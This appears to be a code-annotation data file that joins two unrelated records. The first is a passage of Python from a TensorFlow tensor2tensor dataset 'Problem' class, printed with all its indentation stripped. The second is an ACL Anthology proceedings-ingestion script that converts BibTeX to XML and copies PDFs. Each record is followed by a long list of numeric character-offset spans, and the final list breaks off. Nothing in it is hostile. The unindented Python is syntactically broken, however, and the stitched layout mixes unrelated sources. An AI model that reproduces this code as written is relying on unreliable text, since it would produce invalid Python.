def training_filepaths(self, data_dir, num_shards, shuffled):
file_basename = self.dataset_filename()
if not shuffled:
file_basename += generator_utils.UNSHUFFLED_SUFFIX
return generator_utils.train_data_filenames(file_basename, data_dir,
num_shards)
def dev_filepaths(self, data_dir, num_shards, shuffled):
file_basename = self.dataset_filename()
if not shuffled:
file_basename += generator_utils.UNSHUFFLED_SUFFIX
return generator_utils.dev_data_filenames(file_basename, data_dir,
num_shards)
def test_filepaths(self, data_dir, num_shards, shuffled):
file_basename = self.dataset_filename()
if not shuffled:
file_basename += generator_utils.UNSHUFFLED_SUFFIX
return generator_utils.test_data_filenames(file_basename, data_dir,
num_shards)
def filepattern(self, data_dir, mode, shard=None):
"""Get filepattern for data files for mode.
Matches mode to a suffix.
* TRAIN: train
* EVAL: dev
* PREDICT: dev
* test: test
Args:
data_dir: str, data directory.
mode: tf.estimator.ModeKeys or "test".
shard: int, if provided, will only read data from the specified shard.
Returns:
filepattern str
"""
path = os.path.join(data_dir, self.dataset_filename())
shard_str = "-%05d" % shard if shard is not None else ""
if mode == tf.estimator.ModeKeys.TRAIN:
suffix = "train"
elif mode in [tf.estimator.ModeKeys.EVAL, tf.estimator.ModeKeys.PREDICT]:
suffix = "dev"
else:
assert mode == "test"
suffix = "test"
return "%s-%s%s*" % (path, suffix, shard_str)
def __init__(self, was_reversed=False, was_copy=False):
"""Create a Problem.
Args:
was_reversed: bool, whether to reverse inputs and targets.
was_copy: bool, whether to copy inputs to targets. Can be composed with
was_reversed so that if both are true, the targets become the inputs,
which are then copied to targets so that the task is targets->targets.
"""
self._was_reversed = was_reversed
self._was_copy = was_copy
self._encoders = None
self._hparams = None
self._feature_info = None
def get_feature_encoders(self, data_dir=None):
if self._encoders is None:
self._encoders = self.feature_encoders(data_dir)
return self._encoders
def get_hparams(self, model_hparams=None):
"""Returns problem_hparams."""
if self._hparams is not None:
return self._hparams
if self._encoders is None:
data_dir = (model_hparams and model_hparams.data_dir) or None
self.get_feature_encoders(data_dir)
hp = _default_hparams()
ret = self.hparams(hp, model_hparams)
if ret is not None:
raise ValueError("The Problem subclass hparams function should mutate "
"the defaults passed in and return None.")
hp.add_hparam("vocabulary", self._encoders)
hp.add_hparam("was_reversed", self._was_reversed)
hp.add_hparam("was_copy", self._was_copy)
if self._was_reversed:
_reverse_problem_hparams(hp)
if self._was_copy:
_copy_problem_hparams(hp)
self._hparams = hp
return self._hparams
def maybe_reverse_features(self, feature_map):
if not self._was_reversed:
return
inputs, targets = feature_map["inputs"], feature_map["targets"]
feature_map["inputs"], feature_map["targets"] = targets, inputs
def maybe_copy_features(self, feature_map):
if not self._was_copy:
return
feature_map["targets"] = feature_map["inputs"]
def dataset(self,
mode,
data_dir=None,
num_threads=None,
output_buffer_size=None,
shuffle_files=None,
hparams=None,
preprocess=True,
dataset_split=None,
shard=None):
"""Build a Dataset for this problem.
Args:
mode: tf.estimator.ModeKeys; determines which files to read from.
data_dir: directory that contains data files.
num_threads: int, number of threads to use for decode and preprocess
Dataset.map calls.
output_buffer_size: int, how many elements to prefetch in Dataset.map
calls.
shuffle_files: whether to shuffle input files. Default behavior (i.e. when
shuffle_files=None) is to shuffle if mode == TRAIN.
hparams: tf.contrib.training.HParams; hparams to be passed to
Problem.preprocess_example and Problem.hparams. If None, will use a
default set that is a no-op.
preprocess: bool, whether to map the Dataset through
Problem.preprocess_example.
dataset_split: tf.estimator.ModeKeys + ["test"], which split to read data
from (TRAIN:"-train", EVAL:"-dev", "test":"-test"). Defaults to mode.
shard: int, if provided, will only read data from the specified shard.
Returns:
Dataset containing dict<feature name, Tensor>.
"""
dataset_split = dataset_split or mode
assert data_dir
if hparams is None:
hparams = default_model_hparams()
if not hasattr(hparams, "data_dir"):
hparams.add_hparam("data_dir", data_dir)
if not hparams.data_dir:
hparams.data_dir = data_dir
# Construct the Problem's hparams so that items within it are accessible
_ = self.get_hparams(hparams)
data_fields, data_items_to_decoders = self.example_reading_spec()
if data_items_to_decoders is None:
data_items_to_decoders = {
field: tf.contrib.slim.tfexample_decoder.Tensor(field)
for field in data_fields
}
is_training = mode == tf.estimator.ModeKeys.TRAIN
data_filepattern = self.filepattern(data_dir, dataset_split, shard=shard)
tf.logging.info("Reading data files from %s", data_filepattern)
data_files = tf.contrib.slim.parallel_reader.get_data_files(
data_filepattern)
if shuffle_files or shuffle_files is None and is_training:
random.shuffle(data_files)
dataset = tf.contrib.data.TFRecordDataset(data_files)
def decode_record(record):
"""Serialized Example to dict of <feature name, Tensor>."""
decoder = tf.contrib.slim.tfexample_decoder.TFExampleDecoder(
data_fields, data_items_to_decoders)
decode_items = list(data_items_to_decoders)
decoded = decoder.decode(record, items=decode_items)
return dict(zip(decode_items, decoded))
def _preprocess(example):
example = self.preprocess_example(example, mode, hparams)
self.maybe_reverse_features(example)
self.maybe_copy_features(example)
return example
dataset = dataset.map(decode_record, num_threads=num_threads)
if preprocess:
dataset = dataset.map(
_preprocess,
num_threads=num_threads,
output_buffer_size=output_buffer_size)
return dataset
@property
def has_inputs(self):
return "inputs" in self.get_feature_encoders()
@property
def feature_info(self):
"""Retrieve dict<feature name, FeatureInfo>.
Must first call Problem.get_hparams or Problem.dataset to have the problem's
internal hparams already constructed.
Returns:
dict<feature name, FeatureInfo>
"""
if self._feature_info is not None:
return self._feature_info
assert self._hparams is not None
hp = self.get_hparams()
input_mods = hp.input_modality
target_mod = hp.target_modality
vocabs = hp.vocabulary
if self.has_inputs:
in_id = hp.input_space_id
out_id = hp.target_space_id
features = collections.defaultdict(FeatureInfo)
for name, mod_spec in six.iteritems(input_mods):
mod, vocab_size = mod_spec
finfo = features[name]
finfo.modality = mod
finfo.vocab_size = vocab_size
mod, vocab_size = target_mod
features["targets"].modality = mod
features["targets"].vocab_size = vocab_size
for name, encoder in six.iteritems(vocabs):
features[name].encoder = encoder
if self.has_inputs:
features["inputs"].space_id = in_id
features["targets"].space_id = out_id
self._feature_info = features
return features
class FeatureInfo(object):
def __init__(self,
encoder=None,
modality=None,
vocab_size=None,
space_id=None):
self.encoder = encoder
self.modality = modality
self.vocab_size = vocab_size
self.space_id = space_id
def _copy_problem_hparams(p_hparams):
"""Use input modality, vocab, and space id for target."""
p = p_hparams
# Duplicate input modality.
p.target_modality = p.input_modality["inputs"]
# Duplicate input vocabulary.
p.vocabulary["targets"] = p.vocabulary["inputs"]
# Duplicate input space ids.
p.target_space_id = p.input_space_id
# Mark that p was reversed.
p.was_copy = True
def _reverse_problem_hparams(p_hparams):
"""Swap input/output modalities, vocab, and space ids."""
p = p_hparams
# Swap modalities.
input_modality = p.input_modality["inputs"]
target_modality = p.target_modality
p.input_modality["inputs"] = target_modality
p.target_modality = input_modality
# Swap vocabularies.
input_vocabulary = p.vocabulary["inputs"]
target_vocabulary = p.vocabulary["targets"]
p.vocabulary["inputs"] = target_vocabulary
p.vocabulary["targets"] = input_vocabulary
# Swap input/target space ids.
input_space_id = p.input_space_id
target_space_id = p.target_space_id
p.input_space_id = target_space_id
p.target_space_id = input_space_id
# Mark that p was reversed.
p.was_reversed = True
def _default_hparams():
"""A set of basic model hyperparameters."""
return tf.contrib.training.HParams(
# Use this parameter to get comparable perplexity numbers with different
# tokenizations. This value should be set to the ratio of the number of
# tokens in the test set according to the tokenization used to the number
# of tokens in the test set in the "official" tokenization. For
# example, if we are using a word-piece based model and we want to
# compute per-word perplexity, then we set loss_multiplier to the number
# of wordpieces per word in the test set.
loss_multiplier=1.0,
# Use this parameter to allow for larger sequences in the batch. Without
# the use of this parameter, the size of the inner two dimensions will
# be used to judge the sequence length.
batch_size_multiplier=1,
# To make queues of the right capacity, it's good to know the maximal
# expected batch size, as it can vary a lot. It only affects performance
# of input readers and memory use. The defaults should be safe and fast,
# but decrease if your reader uses a lot of memory and increase if slow.
max_expected_batch_size_per_shard=64,
# During inference for autoregressive problems, if the batch_size is 1,
# the inference will stop when the model predict a text_encoder.EOS_ID
# token.
stop_at_eos=False,
# Modalities used to map from input features to a space compatible with
# chosen model architecture. One modality spec (which is a 2-tuple,
# (modality_full_name, vocab_size)) per feature key. modality_full_name
# is a string type:name, e.g. class_label:class_label_2d. Leaving off
# the name uses the default modality for that type (e.g. class_label ==
# class_label:default).
input_modality={},
# Modality used to map from hidden representation to the target space.
# Specified as a modality spec, a 2-tuple described above.
target_modality=None,
# Identifiers used to tell the model which input/target space will be
# expected. For example, it can tell that we expect French as characters
# as output, or Spanish as sound. Spaces defined as constants in SpaceID
# class.
input_space_id=SpaceID.GENERIC,
target_space_id=SpaceID.GENERIC)
class Text2TextProblem(Problem):
"""Base class for text-to-text problems."""
@property
def is_character_level(self):
"""Whether the inputs and targets are sequences of characters."""
raise NotImplementedError()
@property
def targeted_vocab_size(self):
raise NotImplementedError() # Not needed if self.is_character_level.
def generator(self, data_dir, tmp_dir, is_training):
"""Generator for the training and evaluation data.
Args:
data_dir: The directory in which to assets, e.g. the vocab file.
tmp_dir: A scratch directory (if needed).
is_training: A boolean indicating if we should generate training data
(True) or dev set data (False).
Yields:
dicts with keys "inputs" and "targets", with values being lists of token
ids.
"""
raise NotImplementedError()
@property
def use_train_shards_for_dev(self):
"""If true, we only generate training data and hold out shards for dev."""
return False
@property
def input_space_id(self):
raise NotImplementedError()
@property
def target_space_id(self):
raise NotImplementedError()
@property
def num_shards(self):
raise NotImplementedError()
@property
def num_dev_shards(self):
return 1
@property
def vocab_name(self):
raise NotImplementedError()
@property
def vocab_file(self):
return "%s.%d" % (self.vocab_name, self.targeted_vocab_size)
@property
def use_subword_tokenizer(self):
raise NotImplementedError()
@property
def has_inputs(self):
return True # Set to False for language models.
def generate_data(self, data_dir, tmp_dir, task_id=-1):
train_paths = self.training_filepaths(
data_dir, self.num_shards, shuffled=False)
dev_paths = self.dev_filepaths(
data_dir, self.num_dev_shards, shuffled=False)
if self.use_train_shards_for_dev:
all_paths = train_paths + dev_paths
generator_utils.generate_files(
self.generator(data_dir, tmp_dir, True), all_paths)
generator_utils.shuffle_dataset(all_paths)
else:
generator_utils.generate_dataset_and_shuffle(
self.generator(data_dir, tmp_dir, True), train_paths,
self.generator(data_dir, tmp_dir, False), dev_paths)
def feature_encoders(self, data_dir):
if self.is_character_level:
encoder = text_encoder.ByteTextEncoder()
elif self.use_subword_tokenizer:
vocab_filename = os.path.join(data_dir, self.vocab_file)
encoder = text_encoder.SubwordTextEncoder(vocab_filename)
else:
vocab_filename = os.path.join(data_dir, self.vocab_file)
encoder = text_encoder.TokenTextEncoder(vocab_filename)
if self.has_inputs:
return {"inputs": encoder, "targets": encoder}
return {"targets": encoder}
def hparams(self, defaults, unused_model_hparams):
p = defaults
p.stop_at_eos = int(True)
if self.has_inputs:
source_vocab_size = self._encoders["inputs"].vocab_size
p.input_modality = {
"inputs": (registry.Modalities.SYMBOL, source_vocab_size)
}
target_vocab_size = self._encoders["targets"].vocab_size
p.target_modality = (registry.Modalities.SYMBOL, target_vocab_size)
if self.has_inputs:
p.input_space_id = self.input_space_id
p.target_space_id = self.target_space_id
if self.is_character_level:
p.loss_multiplier = 2.0
def eval_metrics(self):
return [
metrics.Metrics.ACC, metrics.Metrics.ACC_TOP5,
metrics.Metrics.ACC_PER_SEQ, metrics.Metrics.NEG_LOG_PERPLEXITY,
metrics.Metrics.APPROX_BLEU, metrics.Metrics.ROUGE_2_F,
metrics.Metrics.ROUGE_L_F
]
| [
[
[
679,
694
]
],
[
[
718,
726
]
],
[
[
750,
764
]
],
[
[
772,
783
],
[
14238,
14249
]
],
[
[
791,
793
],
[
7942,
7944
],
[
21089,
21091
],
[
21226,
21228
]
],
[
[
801,
807
],
[
12642,
12648
]
],
[
[
836,
839
],
[
14302,
14305
],
[
14601,
14604
]
],
[
[
882,
897
],
[
6721,
6736
],
[
6766,
6781
],
[
7036,
7051
],
[
7081,
7096
],
[
7348,
7363
],
[
7393,
7408
],
[
20577,
20592
],
[
20677,
20692
],
[
20736,
20751
]
],
[
[
940,
952
],
[
5771,
5783
],
[
5818,
5830
],
[
20998,
21010
],
[
21145,
21157
],
[
21282,
21294
]
],
[
[
985,
992
],
[
6253,
6260
],
[
6274,
6281
],
[
6308,
6315
],
[
6337,
6344
],
[
22085,
22092
],
[
22106,
22113
],
[
22140,
22147
],
[
22169,
22176
],
[
22213,
22220
],
[
22242,
22249
],
[
22277,
22284
]
],
[
[
1025,
1033
],
[
21673,
21681
],
[
21814,
21822
]
],
[
[
1041,
1057
],
[
2292,
2294
],
[
2817,
2819
],
[
2883,
2885
],
[
2959,
2961
],
[
5924,
5926
],
[
5941,
5943
],
[
5971,
5973
],
[
5988,
5990
],
[
8066,
8068
],
[
8136,
8138
],
[
8164,
8166
],
[
12190,
12192
],
[
12308,
12310
],
[
12418,
12420
],
[
12499,
12501
],
[
12683,
12685
],
[
16347,
16349
],
[
12841,
12843
]
],
[
[
1067,
1074
],
[
18583,
18590
],
[
18622,
18629
]
],
[
[
2258,
2279
],
[
11743,
11764
]
],
[
[
2436,
2461
],
[
6155,
6180
]
],
[
[
3054,
3061
],
[
18664,
18671
]
],
[
[
14835,
14846
],
[
14262,
14273
]
],
[
[
15124,
15145
],
[
9806,
9827
]
],
[
[
15522,
15546
],
[
9748,
9772
]
],
[
[
16272,
16288
],
[
9336,
9352
]
],
[
[
18647,
18663
]
]
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2019, 2020 Matt Post <post@cs.jhu.edu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Ingests data into the Anthology. It takes a list of one or more
ACLPUB proceedings/ directories and does the following:
- executes some basic sanity checks
- applies normalization to names and titles (e.g, fixed-case protection)
- generates the nexted XML in the Anthology repository
- copies the PDFs and attachments into place for rsyncing to the server
Updated in March 2020, this script replaces:
- the old ingest.py (which converted the old ACLPUB flat XML format)
- anthologize.pl in ACLPUB
- anthology_xml.py in ACLPUB
"""
import argparse
import iso639
import os
import re
import readline
import shutil
import sys
import lxml.etree as etree
from collections import defaultdict, OrderedDict
from datetime import datetime
from normalize_anth import normalize
from anthology.bibtex import read_bibtex
from anthology.index import AnthologyIndex
from anthology.people import PersonName
from anthology.sigs import SIGIndex
from anthology.utils import (
make_simple_element,
build_anthology_id,
deconstruct_anthology_id,
indent,
compute_hash_from_file,
)
from anthology.venues import VenueIndex
from itertools import chain
from typing import Dict, Any
from slugify import slugify
def log(text: str, fake: bool = False):
message = "[DRY RUN] " if fake else ""
print(f"{message}{text}", file=sys.stderr)
def read_meta(path: str) -> Dict[str, Any]:
meta = {"chairs": []}
with open(path) as instream:
for line in instream:
if re.match(r"^\s*$", line):
continue
key, value = line.rstrip().split(" ", maxsplit=1)
if key.startswith("chair"):
meta["chairs"].append(value)
else:
meta[key] = value
if "volume" in meta and re.match(rf"^[a-z0-1]+$", meta["volume"]) is None:
raise Exception(f"Invalid volume key '{meta['volume']}' in {path}")
return meta
def maybe_copy(source_path, dest_path):
"""Copies the file if it's different from the target."""
if not os.path.exists(dest_path) or compute_hash_from_file(
source_path
) != compute_hash_from_file(dest_path):
log(f"Copying {source_path} -> {dest_path}", args.dry_run)
shutil.copyfile(source_path, dest_path)
def bib2xml(bibfilename, anthology_id):
"""
Moved here from ACLPUB's anthology_xml.py script.
"""
fields = [
'title',
'author',
'editor',
'booktitle',
'month',
'year',
'address',
'publisher',
'pages',
'abstract',
'url',
'doi',
'language',
]
try:
collection_id, volume_name, paper_no = deconstruct_anthology_id(anthology_id)
except ValueError:
print(f"Couldn't split {anthology_id}", file=sys.stderr)
sys.exit(1)
if paper_no == '':
return # skip the master bib file; we only process the individual files
bibdata = read_bibtex(bibfilename)
if len(bibdata.entries) != 1:
log(f"more than one entry in {bibfilename}")
bibkey, bibentry = bibdata.entries.items()[0]
if len(bibentry.fields) == 0:
log(f"parsing bib of paper {paper_no} failed")
sys.exit(1)
paper = make_simple_element("paper", attrib={"id": paper_no})
for field in list(bibentry.fields) + list(bibentry.persons):
if field not in fields:
log(f"unknown field {field}")
for field in fields:
if field in ['author', 'editor']:
if field in bibentry.persons:
for person in bibentry.persons[field]:
first_text = ' '.join(person.bibtex_first_names)
last_text = ' '.join(person.prelast_names + person.last_names)
if person.lineage_names:
last_text += ', ' + ' '.join(person.lineage_names)
# Don't distinguish between authors that have only a first name
# vs. authors that have only a last name; always make it a last name.
if last_text.strip() in [
'',
'-',
]: # Some START users have '-' for null
last_text = first_text
first_text = ''
name_node = make_simple_element(field, parent=paper)
make_simple_element("first", first_text, parent=name_node)
make_simple_element("last", last_text, parent=name_node)
else:
if field == 'url':
value = f"{anthology_id}"
elif field in bibentry.fields:
value = bibentry.fields[field]
elif field == 'bibtype':
value = bibentry.type
elif field == 'bibkey':
value = bibkey
else:
continue
try:
make_simple_element(field, text=value, parent=paper)
except:
print(
f"Couldn't process {bibfilename} for {anthology_id}", file=sys.stderr
)
sys.exit(2)
return paper
def main(args):
collections = defaultdict(OrderedDict)
volumes = {}
anthology_datadir = os.path.join(os.path.dirname(sys.argv[0]), "..", "data")
venue_index = VenueIndex(srcdir=anthology_datadir)
venue_keys = [venue["slug"].lower() for _, venue in venue_index.items()]
sig_index = SIGIndex(srcdir=anthology_datadir)
# Build list of volumes, confirm uniqueness
unseen_venues = []
for proceedings in args.proceedings:
meta = read_meta(os.path.join(proceedings, "meta"))
venue_abbrev = meta["abbrev"]
venue_slug = venue_index.get_slug(venue_abbrev)
if str(datetime.now().year) in venue_abbrev:
print(f"Fatal: Venue assembler put year in acronym: '{venue_abbrev}'")
sys.exit(1)
if re.match(r".*\d$", venue_abbrev) is not None:
print(
f"WARNING: Venue {venue_abbrev} ends in a number, this is probably a mistake"
)
if venue_slug not in venue_keys:
unseen_venues.append((venue_slug, venue_abbrev, meta["title"]))
meta["path"] = proceedings
meta["collection_id"] = collection_id = meta["year"] + "." + venue_slug
volume_name = meta["volume"].lower()
volume_full_id = f"{collection_id}-{volume_name}"
if volume_full_id in volumes:
print("Error: ")
collections[collection_id][volume_name] = {}
volumes[volume_full_id] = meta
if "sig" in meta:
print(
f"Add this line to {anthology_datadir}/sigs/{meta['sig'].lower()}.yaml:"
)
print(f" - {meta['year']}:")
print(f" - {volume_full_id} # {meta['booktitle']}")
# Make sure all venues exist
if len(unseen_venues) > 0:
for venue in unseen_venues:
slug, abbrev, title = venue
print(f"Creating venue '{abbrev}' ({title})")
venue_index.add_venue(abbrev, title)
venue_index.dump(directory=anthology_datadir)
# Copy over the PDFs and attachments
for volume, meta in volumes.items():
root_path = os.path.join(meta["path"], "cdrom")
collection_id = meta["collection_id"]
venue_name = meta["abbrev"].lower()
volume_name = meta["volume"].lower()
year = meta["year"]
pdfs_dest_dir = os.path.join(args.pdfs_dir, venue_name)
if not os.path.exists(pdfs_dest_dir):
os.makedirs(pdfs_dest_dir)
# copy the book
book_dest_path = (
os.path.join(pdfs_dest_dir, f"{collection_id}-{volume_name}") + ".pdf"
)
# try the standard filename, e.g., 2021.naacl-main.pdf
book_src_filename = f'{year}.{meta["abbrev"]}-{volume_name}.pdf'
book_src_path = os.path.join(root_path, book_src_filename)
if not os.path.exists(book_src_path):
# try a different filename, e.g., "NLP4CALL-2021.pdf"
book_src_filename = f'{meta["abbrev"]}-{year}.pdf'
book_src_path = os.path.join(root_path, book_src_filename)
if os.path.exists(book_src_path) and not args.dry_run:
maybe_copy(book_src_path, book_dest_path)
# copy the paper PDFs
pdf_src_dir = os.path.join(root_path, "pdf")
for pdf_file in os.listdir(pdf_src_dir):
# Skip . files
if os.path.basename(pdf_file).startswith("."):
continue
# names are {abbrev}{number}.pdf
match = re.match(rf".*\.(\d+)\.pdf", pdf_file)
if match is not None:
paper_num = int(match[1])
paper_id_full = f"{collection_id}-{volume_name}.{paper_num}"
bib_path = os.path.join(
root_path,
"bib",
pdf_file.replace("/pdf", "/bib/").replace(".pdf", ".bib"),
)
pdf_src_path = os.path.join(pdf_src_dir, pdf_file)
pdf_dest_path = os.path.join(
pdfs_dest_dir, f"{collection_id}-{volume_name}.{paper_num}.pdf"
)
if not args.dry_run:
maybe_copy(pdf_src_path, pdf_dest_path)
collections[collection_id][volume_name][paper_num] = {
"anthology_id": paper_id_full,
"bib": bib_path,
"pdf": pdf_dest_path,
"attachments": [],
}
# copy the attachments
if os.path.exists(os.path.join(root_path, "additional")):
attachments_dest_dir = os.path.join(args.attachments_dir, venue_name)
if not os.path.exists(attachments_dest_dir):
os.makedirs(attachments_dest_dir)
for attachment_file in os.listdir(os.path.join(root_path, "additional")):
if os.path.basename(attachment_file).startswith("."):
continue
attachment_file_path = os.path.join(
root_path, "additional", attachment_file
)
match = re.match(
rf"{year}\.{venue_name}-\w+\.(\d+)_?(\w+)\.(\w+)$", attachment_file
)
if match is None:
print(
f"* Warning: no attachment match for {attachment_file}",
file=sys.stderr,
)
sys.exit(2)
paper_num, type_, ext = match.groups()
paper_num = int(paper_num)
file_name = f"{collection_id}-{volume_name}.{paper_num}.{type_}.{ext}"
dest_path = os.path.join(attachments_dest_dir, file_name)
if not args.dry_run and not os.path.exists(dest_path):
log(f"Copying {attachment_file} -> {dest_path}", args.dry_run)
shutil.copyfile(attachment_file_path, dest_path)
collections[collection_id][volume_name][paper_num]["attachments"].append(
(dest_path, type_)
)
people = AnthologyIndex(None, srcdir=anthology_datadir)
def correct_caps(person, name_node, anth_id):
"""
Many people submit their names in "ALL CAPS" or "all lowercase".
Correct this with heuristics.
"""
name = name_node.text
if name.islower() or name.isupper():
# capitalize all parts
corrected = " ".join(list(map(lambda x: x.capitalize(), name.split())))
print(
f"-> Correcting capitalization of '{name}' to '{corrected}'",
file=sys.stderr,
)
name_node.text = corrected
def disambiguate_name(node, anth_id):
name = PersonName.from_element(node)
ids = people.get_ids(name)
if len(ids) > 1:
choice = -1
while choice < 0 or choice >= len(ids):
print(
f"({anth_id}): ambiguous author {name}; Please choose from the following:"
)
for i, id_ in enumerate(ids):
print(f"[{i}] {id_} ({people.get_comment(id_)})")
choice = int(input("--> "))
node.attrib["id"] = ids[choice]
for collection_id, collection in collections.items():
# Newly added volumes, so we can normalize and name-disambig later
newly_added_volumes = []
collection_file = os.path.join(
args.anthology_dir, "data", "xml", f"{collection_id}.xml"
)
if os.path.exists(collection_file):
root_node = etree.parse(collection_file).getroot()
else:
root_node = make_simple_element("collection", attrib={"id": collection_id})
for volume_id, volume in collection.items():
volume_node = make_simple_element(
"volume",
attrib={"id": volume_id, "ingest-date": args.ingest_date},
)
# Replace the existing one if present
existing_volume_node = root_node.find(f"./volume[@id='{volume_id}']")
for i, child in enumerate(root_node):
if child.attrib["id"] == volume_id:
root_node[i] = volume_node
break
else:
root_node.append(volume_node)
meta_node = None
for paper_num, paper in sorted(volume.items()):
paper_id_full = paper["anthology_id"]
bibfile = paper["bib"]
paper_node = bib2xml(bibfile, paper_id_full)
if paper_node.attrib["id"] == "0":
# create metadata subtree
meta_node = make_simple_element("meta", parent=volume_node)
title_node = paper_node.find("title")
title_node.tag = "booktitle"
meta_node.append(title_node)
for author_or_editor in chain(
paper_node.findall("./author"), paper_node.findall("./editor")
):
meta_node.append(author_or_editor)
author_or_editor.tag = "editor"
meta_node.append(paper_node.find("publisher"))
meta_node.append(paper_node.find("address"))
meta_node.append(paper_node.find("month"))
meta_node.append(paper_node.find("year"))
if book_dest_path is not None:
make_simple_element(
"url",
text=f"{collection_id}-{volume_name}",
attrib={"hash": compute_hash_from_file(book_dest_path)},
parent=meta_node,
)
# modify frontmatter tag
paper_node.tag = "frontmatter"
del paper_node.attrib["id"]
else:
# remove unneeded fields
for child in paper_node:
if child.tag in [
"editor",
"address",
"booktitle",
"publisher",
"year",
"month",
]:
paper_node.remove(child)
url = paper_node.find("./url")
if url is not None:
url.attrib["hash"] = compute_hash_from_file(paper["pdf"])
for path, type_ in paper["attachments"]:
make_simple_element(
"attachment",
text=os.path.basename(path),
attrib={
"type": type_,
"hash": compute_hash_from_file(path),
},
parent=paper_node,
)
if len(paper_node) > 0:
volume_node.append(paper_node)
# Normalize
for oldnode in paper_node:
normalize(oldnode, informat="latex")
# Adjust the language tag
language_node = paper_node.find("./language")
if language_node is not None:
try:
lang = iso639.languages.get(name=language_node.text)
except KeyError:
raise Exception(f"Can't find language '{language_node.text}'")
language_node.text = lang.part3
print(language_node.text)
# Fix author names
for name_node in chain(
paper_node.findall("./author"), paper_node.findall("./editor")
):
disambiguate_name(name_node, paper_id_full)
person = PersonName.from_element(name_node)
for name_part in name_node:
correct_caps(person, name_part, paper_id_full)
# Other data from the meta file
if "isbn" in meta:
make_simple_element("isbn", meta["isbn"], parent=meta_node)
indent(root_node)
tree = etree.ElementTree(root_node)
tree.write(
collection_file, encoding="UTF-8", xml_declaration=True, with_tail=True
)
if __name__ == "__main__":
now = datetime.now()
today = f"{now.year}-{now.month:02d}-{now.day:02d}"
parser = argparse.ArgumentParser()
parser.add_argument(
"proceedings", nargs="+", help="List of paths to ACLPUB proceedings/ directories."
)
parser.add_argument(
"--ingest-date",
"-d",
type=str,
default=today,
help="Ingestion date as YYYY-MM-DD. Default: %(default)s.",
)
anthology_path = os.path.join(os.path.dirname(sys.argv[0]), "..")
parser.add_argument(
"--anthology-dir",
"-r",
default=anthology_path,
help="Root path of ACL Anthology Github repo. Default: %(default)s.",
)
pdfs_path = os.path.join(os.environ["HOME"], "anthology-files", "pdf")
parser.add_argument(
"--pdfs-dir", "-p", default=pdfs_path, help="Root path for placement of PDF files"
)
attachments_path = os.path.join(os.environ["HOME"], "anthology-files", "attachments")
parser.add_argument(
"--attachments-dir",
"-a",
default=attachments_path,
help="Root path for placement of PDF files",
)
parser.add_argument(
"--dry-run", "-n", action="store_true", help="Don't actually copy anything."
)
args = parser.parse_args()
main(args)
| [
[
[
1191,
1199
],
[
18392,
18400
]
],
[
[
1207,
1213
],
[
17250,
17256
]
],
[
[
1221,
1223
],
[
18740,
18742
],
[
18753,
18755
],
[
18987,
18989
],
[
19000,
19002
],
[
19191,
19193
],
[
19204,
19206
],
[
2677,
2679
],
[
5919,
5921
],
[
5932,
5934
],
[
6298,
6300
],
[
7936,
7938
],
[
8160,
8162
],
[
8215,
8217
],
[
8258,
8260
],
[
8349,
8351
],
[
8591,
8593
],
[
8649,
8651
],
[
8837,
8839
],
[
8892,
8894
],
[
9051,
9053
],
[
9106,
9108
],
[
9173,
9175
],
[
9529,
9531
],
[
9730,
9732
],
[
9798,
9800
],
[
10313,
10315
],
[
10328,
10330
],
[
10403,
10405
],
[
10469,
10471
],
[
10523,
10525
],
[
10592,
10594
],
[
10603,
10605
],
[
10662,
10664
],
[
10781,
10783
],
[
11466,
11468
],
[
11556,
11558
],
[
13267,
13269
],
[
13372,
13374
],
[
16564,
16566
]
],
[
[
1231,
1233
],
[
2141,
2143
],
[
2419,
2421
],
[
6601,
6603
],
[
9308,
9310
],
[
10898,
10900
]
],
[
[
1241,
1249
]
],
[
[
1257,
1263
],
[
2869,
2875
],
[
11686,
11692
]
],
[
[
1271,
1274
],
[
18769,
18772
],
[
1979,
1982
],
[
3449,
3452
],
[
3469,
3472
],
[
3859,
3862
],
[
5741,
5744
],
[
5786,
5789
],
[
5948,
5951
],
[
6577,
6580
],
[
11185,
11188
],
[
11239,
11242
],
[
12442,
12445
]
],
[
[
1283,
1302
],
[
13429,
13434
],
[
18125,
18130
]
],
[
[
1328,
1339
],
[
5852,
5863
]
],
[
[
1341,
1352
],
[
5864,
5875
]
],
[
[
1374,
1382
],
[
18307,
18315
],
[
6444,
6452
]
],
[
[
1411,
1420
],
[
17006,
17015
]
],
[
[
1450,
1461
],
[
3600,
3611
]
],
[
[
1490,
1504
],
[
11897,
11911
]
],
[
[
1534,
1544
],
[
17789,
17799
],
[
12565,
12575
]
],
[
[
1572,
1580
],
[
6125,
6133
]
],
[
[
1615,
1634
],
[
3884,
3903
],
[
4973,
4992
],
[
5034,
5053
],
[
5113,
5132
],
[
5566,
5585
],
[
13506,
13525
],
[
13650,
13669
],
[
14533,
14552
],
[
15345,
15364
],
[
16476,
16495
],
[
18023,
18042
]
],
[
[
1640,
1658
]
],
[
[
1664,
1688
],
[
3334,
3358
]
],
[
[
1694,
1700
],
[
18092,
18098
]
],
[
[
1706,
1728
],
[
2706,
2728
],
[
2759,
2781
],
[
15512,
15534
],
[
16361,
16383
],
[
16700,
16722
]
],
[
[
1761,
1771
],
[
5994,
6004
]
],
[
[
1795,
1800
],
[
14781,
14786
],
[
17587,
17592
]
],
[
[
1820,
1824
],
[
2021,
2025
]
],
[
[
1826,
1829
],
[
2031,
2034
]
],
[
[
1851,
1858
]
],
[
[
1865,
1868
],
[
2802,
2805
],
[
3667,
3670
],
[
3804,
3807
],
[
4047,
4050
],
[
11603,
11606
]
],
[
[
1997,
2006
],
[
6288,
6297
]
],
[
[
2569,
2579
],
[
8956,
8966
],
[
9971,
9981
]
],
[
[
2915,
2922
],
[
14371,
14378
]
],
[
[
5822,
5826
],
[
19571,
19575
]
],
[
[
18301,
18304
],
[
18337,
18340
],
[
18348,
18351
],
[
18364,
18367
]
],
[
[
18326,
18331
],
[
18638,
18643
]
],
[
[
18383,
18389
],
[
18422,
18428
],
[
18544,
18550
],
[
18793,
18799
],
[
19050,
19056
],
[
19262,
19268
],
[
19423,
19429
],
[
19546,
19552
]
],
[
[
18723,
18737
],
[
18871,
18885
]
],
[
[
18975,
18984
],
[
19107,
19116
]
],
[
[
19172,
19188
],
[
19342,
19358
]
],
[
[
19539,
19543
